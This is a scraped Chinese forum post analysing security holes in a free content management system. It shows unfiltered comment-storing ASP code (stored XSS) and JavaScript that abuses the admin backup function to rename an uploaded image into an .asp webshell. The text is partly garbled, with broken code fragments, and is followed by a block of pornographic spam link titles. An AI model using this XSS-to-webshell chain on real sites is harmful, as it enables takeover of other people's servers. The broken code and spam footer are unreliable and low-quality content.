<dfn id="is4kg"></dfn>
  • <ul id="is4kg"></ul>
  • <abbr id="is4kg"></abbr>
  • <ul id="is4kg"></ul>
    <bdo id="is4kg"></bdo>

    曙海教育集團(tuán)論壇開發(fā)語言培訓(xùn)專區(qū)SQL Server數(shù)據(jù)庫 → 利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全


      共有7052人關(guān)注過本帖樹形打印

    主題:利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全

    美女呀,離線,留言給我吧!
    wangxinxin
      1樓 個(gè)性首頁 | 博客 | 信息 | 搜索 | 郵箱 | 主頁 | UC


    加好友 發(fā)短信
    等級:青蜂俠 帖子:1393 積分:14038 威望:0 精華:0 注冊:2010-11-12 11:08:23
    利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全  發(fā)帖心情 Post By:2010-12-13 13:47:46

    前言:
    ???? 最近上cnzz下載了一套網(wǎng)站管理系統(tǒng),在源碼首頁發(fā)現(xiàn)它,心想cnzz都推薦應(yīng)該安全性相當(dāng)不錯(cuò)了.官方下載最新版本本地搭建IIS測試發(fā)現(xiàn)簡潔易用,整體上安全做得不錯(cuò).由于是免費(fèi)版的,可能官方有點(diǎn)放水.不過這里不影響我們的分析,這里討論兩個(gè)方面:跨站的利用,SQL注射.還是一句話:重在思路.
    一.隱藏的數(shù)據(jù)庫
    分析代碼經(jīng)常要用到數(shù)據(jù)庫(我分析的是Access版本的) ,習(xí)慣性的打開數(shù)據(jù)庫,驚奇的發(fā)現(xiàn)只有一個(gè)notdown表,如圖01:
      
    可是再仔細(xì)查看代碼發(fā)現(xiàn)不應(yīng)該只有這張表的,于是就想是不是隱藏起來了?第一次看到這種情況,于是就查看了下Access幫助說明,在其中發(fā)現(xiàn)原來有還存在兩種屬性的數(shù)據(jù)表,即系統(tǒng)對象和隱藏對象.下面做一個(gè)小知識補(bǔ)充:
    由于Access默認(rèn)是不顯示系統(tǒng)對象和隱藏對象的.所以如果一個(gè)表中存在隱藏對象或者系統(tǒng)對象那么就無法看到該表了. 簡單說下隱藏方法,設(shè)計(jì)好表后右擊表選擇&quot;屬性&quot;-&gt;&quot;隱藏&quot;屬性打勾,刷新下就看不到了,這樣就是隱藏對象了,默認(rèn)是看不到的.至于系統(tǒng)對象,我們可以修改表的前綴為 usys,這樣就可以把表改成一個(gè)系統(tǒng)對象.這兩種方法都可以.
    既然可以隱藏當(dāng)然也可以恢復(fù)顯示了, 按如下操作:“工具”菜單-&gt;“選項(xiàng)”命令-&gt;“視圖”選項(xiàng)卡-&gt;選中“顯示”一欄下的“系統(tǒng)對象”復(fù)選框或者&quot;隱藏對象&quot;復(fù)選框,并按下“確定”按鈕,就可以重新顯示所有表了.如圖02
      
    Ok了,數(shù)據(jù)就可以和正常的一樣了.
    二.跨站的深入利用雞肋
    首先看看漏洞文件/include/PlS.asp,查看代碼發(fā)現(xiàn)是一個(gè)評論顯示,在多個(gè)文件被包含了,代碼如下:  
    &quot;&quot; then
    ??????Dim Author,Content,mycode
    ????Author=Trim(Request.Form(&quot;Author&quot;))// 簡單的過濾空格
    ????Content=Trim(Request.Form(&quot;Content&quot;)) //同上
    ????mycode = trim(request.form(&quot;code&quot;))
    ??????if Author=&quot;&quot; or Content=&quot;&quot; then
    ??????Call Alert (&quot;請?zhí)顚懲暾偬峤?amp;quot;,&quot;-1&quot;)
    ????end if
    ????if mycodeSession(&quot;getcode&quot;) then
    ?????? Call Alert (&quot;您輸入驗(yàn)證碼錯(cuò)誤&quot;,&quot;-1&quot;)
    ????end if
    ??????set rs = server.CreateObject (&quot;adodb.recordset&quot;)
    ????sql=&quot;select * from zhi_rui_E_Pl&quot;
    ????rs.open sql,conn,1,3
    ????rs.addnew
    ????rs(&quot;cli&quot;)=Request.Form(&quot;cli&quot;)
    ????rs(&quot;Ioid&quot;)=request.Form(&quot;Inid&quot;)
    ????rs(&quot;Author&quot;)=Author
    ????rs(&quot;Content&quot;)=Content
    ??------------------------省略部分代碼-------------------------------
    %&gt;

    顯然沒有任何過濾,直接寫入數(shù)據(jù)庫,跨站產(chǎn)生了.由于數(shù)據(jù)庫是mdb格式的,所有插馬也沒用.這里就想到了是否可以備份數(shù)據(jù)庫?進(jìn)入后臺看到數(shù)據(jù)庫備份,查看如圖03:
      
    看到了沒,據(jù)庫路徑和備份文件名都不能修改,有些朋友可能就到這里停止,其實(shí)不然,還可以繼續(xù),經(jīng)驗(yàn)告訴我,他是將該輸入框?qū)懗蒱idden隱藏域了,查看文件/admin/Admin_Data.asp代碼如下:  
    &quot; size=&quot;40&quot; /&gt;[/td]

    看到這行type=hidden,猜測沒錯(cuò).那也就是說同樣可以備份任意文件了.所有后臺拿shell比較簡單了.(插馬備份數(shù)據(jù)庫比較麻煩,要繞過// 判斷瀏覽器類型并定義創(chuàng)建xmlhttp會(huì)話
    if (window.XMLHttpRequest)
    {
    ??xmlhttp = new XMLHttpRequest();
    } else if (window.ActiveXObject)
    {
    ??try
    ??{
    ????xmlhttp = new ActiveXObject(&quot;Msxml2.XMLHTTP&quot;);
    ??}
    ??catch (e)
    ??{
    ????try
    ????{
    ??????xmlhttp = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);
    ????}
    ????catch (e)
    ????{
    ????}
    ??}
    }
    function backup()
    {
    ??var postStr = &quot;DBpath=upload/2009082150598817.jpg&amp;bkfolder=../DataBase/bak/&amp;bkDBname=l4nk0r.asp&quot;;
    ??xmlhttp.open(&quot圖片點(diǎn)擊可在新窗口打開查看OST&quot;,&quot;/admin/Admin_data.asp?action=RestoreData&amp;act=Restore&quot;,true);
    ??xmlhttp.setRequestHeader(&quot;Content-Type&quot;,&quot;application/x-www-form-urlencoded&quot;);
    ??xmlhttp.send(postStr);
    }
    Backup();

    然后在你要提交的地方提交

    支持(0中立(0反對(0單帖管理 | 引用 | 回復(fù) 回到頂部

    返回版面帖子列表

    利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全








    簽名
    主站蜘蛛池模板: 秋葵视频在线免费观看| yellow网站在线观看| 欧美与黑人午夜性猛交久久久| 啦啦啦www播放日本观看| 14又嫩又紧水又多| 天天在线欧美精品免费看| 久久亚洲精品中文字幕| 杨晨晨被老师掀裙子露内内| 你是我的女人中文字幕高清| 综合激情区视频一区视频二区| 国产激情自拍视频| hd日本扒衣党视频播放| 性高湖久久久久久久久| 五月天综合婷婷| 欧美伊久线香蕉线新在线| 免费中日高清无专码有限公司| 美雪艾莉丝番号| 国产成人精品无码一区二区老年人| 亚洲精品成人网站在线播放| 精品国产精品久久一区免费式| 国产成人精品免费久久久久| 99久久婷婷国产综合精品| 好吊色欧美一区二区三区四区 | 亚洲综合色视频在线观看| 精品伊人久久香线蕉| 国产剧情麻豆剧果冻传媒视频免费| 69堂在线观看| 国内精品久久久久久久影视| 不卡精品国产_亚洲人成在线| 无码日韩精品一区二区免费| 亚洲一级片在线播放| 欧美性生交xxxxx久久久| 伊人久久精品一区二区三区| 粗大的内捧猛烈进出在线视频| 国产不卡在线视频| 蜜臀色欲AV在线播放国产日韩 | 国产精品无码MV在线观看| www国产亚洲精品久久久日本| 忘忧草日本在线播放www| 久久国产亚洲精品| 日本高清视频免费观看|